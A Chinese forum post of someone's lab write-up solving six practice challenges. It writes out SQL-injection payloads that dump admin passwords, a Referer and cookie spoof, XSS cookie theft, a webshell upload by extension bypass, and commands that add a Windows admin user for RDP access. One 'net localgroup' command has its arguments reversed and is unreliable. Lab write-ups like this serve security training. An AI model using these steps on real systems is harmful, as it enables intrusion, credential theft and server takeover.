0717萌化大神靶场笔记

mengstion   ·   发表于 2018-07-17 22:24:41   ·   技术文章投稿区

第一题 :

看到?id=1 想到注入 尝试and 1=1返回正常 ,and 1=2 返回错误 确定存在注入漏洞

然后order by 2正常 order by 3错误  说明有两个字段

然后 id=1 and 1=2 union select 1,2 from admin 发现2能回显 然后 id=1 and 1=2 union 

select 1,password from admin 爆出密码

第二题:

先用order by 爆出有10个字段 由于get注入被拦截 利用cookie进行注入 

id=171 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin 发现2 3都能回显

然后 id=171 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin

获得用户名和密码 然后对密码进行md5解密 得到密码

第三题:

登陆网站后发现不允许从外部链接地址进入 用burp抓包之后 把cookie和referer的地址修改为

127.0.0.1 然后成功登陆

第四题:

登陆网站 发现留言板 尝试利用XSS获取管理员cookie 登陆http://xsspt.com 构造代码 注入 

获得管理员cookie  在cookie中发现zkz

第五题:

用上一关获取到的cookie成功登陆到网站管理后台 在产品管理的地方发现上传点 尝试上传一

句话木马 发现被查杀 然后修改后缀为.cer 成功上传 然后利用菜刀成功连接 找到网站目录 

成功拿到flag

第六题:

利用cmd。exe执行iis6.exe添加用户

net user desk 123456 /add

对添加的用户进行提权

net localgroup desk administrators /add

然后用tasklist -svc 列出所有进程 找到远程桌面服务 TermService

然后用netstat -ano查看TermService对应的PID所开发的端口号

最后用mstsc.exe 进行远程3389连接 用上面创建的用户名和密码登陆远程桌面 在C盘找到flag


打赏我,让我更有动力~

0 Reply   |  Until 2018-7-17 | 903 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.